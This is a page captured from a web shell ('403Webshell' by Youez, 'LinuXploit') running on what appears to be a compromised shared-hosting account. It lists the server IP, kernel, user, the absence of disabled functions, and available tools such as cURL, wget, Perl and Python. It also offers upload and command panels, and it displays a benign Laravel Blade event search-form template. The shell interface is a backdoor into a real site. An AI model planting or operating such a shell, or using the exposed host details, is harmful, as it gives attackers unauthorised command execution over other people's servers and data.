403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.188.62.10
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/modules/Event/Views/frontend/layouts/search/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/modules/Event/Views/frontend/layouts/search/form-search.blade.php
<form action="{{ route("event.search") }}" class="form bravo_form" method="get">
    <div class="g-field-search">
        <div class="row">
            @php $event_search_fields = setting_item_array('event_search_fields');
            $event_search_fields = array_values(\Illuminate\Support\Arr::sort($event_search_fields, function ($value) {
                return $value['position'] ?? 0;
            }));
            @endphp
            @if(!empty($event_search_fields))
                @foreach($event_search_fields as $field)
                    @php $field['title'] = $field['title_'.app()->getLocale()] ?? $field['title'] ?? "" @endphp
                    <div class="col-md-{{ $field['size'] ?? "6" }} border-right">
                        @switch($field['field'])
                            @case ('service_name')
                                @include('Event::frontend.layouts.search.fields.service_name')
                            @break
                            @case ('location')
                                @include('Event::frontend.layouts.search.fields.location')
                            @break
                            @case ('date')
                                @include('Event::frontend.layouts.search.fields.date')
                            @break
                            @case ('attr')
                                @include('Event::frontend.layouts.search.fields.attr')
                            @break
                        @endswitch
                    </div>
                @endforeach
            @endif
        </div>
    </div>
    <div class="g-button-submit">
        <button class="btn btn-primary btn-search" type="submit">{{__("Search")}}</button>
    </div>
</form>

Youez - 2016 - github.com/yon3zu
LinuXploit